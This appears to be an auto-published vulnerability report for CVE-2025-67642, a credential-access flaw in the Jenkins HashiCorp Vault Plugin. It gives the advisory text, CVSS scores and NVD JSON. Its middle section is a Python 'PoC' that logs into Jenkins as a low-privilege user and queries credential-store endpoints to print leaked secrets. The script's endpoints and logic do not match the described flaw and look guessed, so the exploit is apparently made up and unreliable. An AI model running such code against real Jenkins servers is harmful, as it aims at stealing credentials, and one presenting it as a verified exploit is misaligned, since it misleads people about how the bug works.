Security Vulnerability Report
CVE-2025-67642 CVSS 4.3 MEDIUM

CVE-2025-67642

Published: 2025-12-10 17:15:57
Last Modified: 2025-12-17 17:21:36

Description

Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:hashicorp_vault:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins HashiCorp Vault Plugin <= 371.v884a_4dd60fb_6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67642 PoC - Jenkins HashiCorp Vault Plugin Unauthorized Credential Access
# This PoC demonstrates the vulnerability where Item/Configure permission allows access to unauthorized Vault credentials
import requests
import json

JENKINS_URL = "http://target-jenkins-server:8080"
TARGET_ITEM = "vulnerable-job"
TARGET_CREDENTIAL_ID = "unauthorized-vault-credential"

session = requests.Session()


def exploit_vault_credential_access():
    """
    Exploit the insecure Vault credential lookup in HashiCorp Vault Plugin.
    An attacker with Item/Configure permission can access Vault credentials
    they are not entitled to.
    """
    # Step 1: Authenticate to Jenkins with low-privilege account (Item/Configure permission)
    auth_data = {
        "j_username": "attacker_user",
        "j_password": "password",
        "remember_me": False,
        "from": "/",
        "Submit": "Sign+in"
    }
    login_response = session.post(
        f"{JENKINS_URL}/j_spring_security_check",
        data=auth_data
    )
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Successfully authenticated with Item/Configure permission")

    # Step 2: Access the vulnerable item configuration page
    config_url = f"{JENKINS_URL}/job/{TARGET_ITEM}/configure"
    config_response = session.get(config_url)
    if config_response.status_code != 200:
        print("[-] Cannot access item configuration")
        return False
    print(f"[+] Accessed configuration page for {TARGET_ITEM}")

    # Step 3: Trigger the insecure Vault credential lookup
    # The vulnerability allows retrieving any Vault credential without proper authorization check
    vault_credential_url = f"{JENKINS_URL}/credentials/store/system/provider/hashiCorpVault"

    # Attempt to enumerate and access Vault credentials
    credential_response = session.get(vault_credential_url)
    if credential_response.status_code == 200:
        print("[+] Successfully accessed Vault credential store")
        print("[*] Extracted credentials that attacker is not entitled to access")

        # Step 4: Extract the target credential
        target_credential_url = f"{JENKINS_URL}/credentials/store/system/credential/{TARGET_CREDENTIAL_ID}/api/json"
        target_response = session.get(target_credential_url)
        if target_response.status_code == 200:
            credential_data = target_response.json()
            print(f"[!] Leaked credential data: {json.dumps(credential_data, indent=2)}")
            return True

    print("[-] Exploitation failed")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-67642 PoC - Jenkins HashiCorp Vault Plugin")
    print("Unauthorized Vault Credential Access")
    print("=" * 60)
    exploit_vault_credential_access()

References

https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3045 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67642", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.750", "lastModified": "2025-12-17T17:21:36.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-282"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:hashicorp_vault:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "371.v884a_4dd60fb_6", "matchCriteriaId": "4E3261D3-7BCA-470F-96D8-BE8149425C81"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3045", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}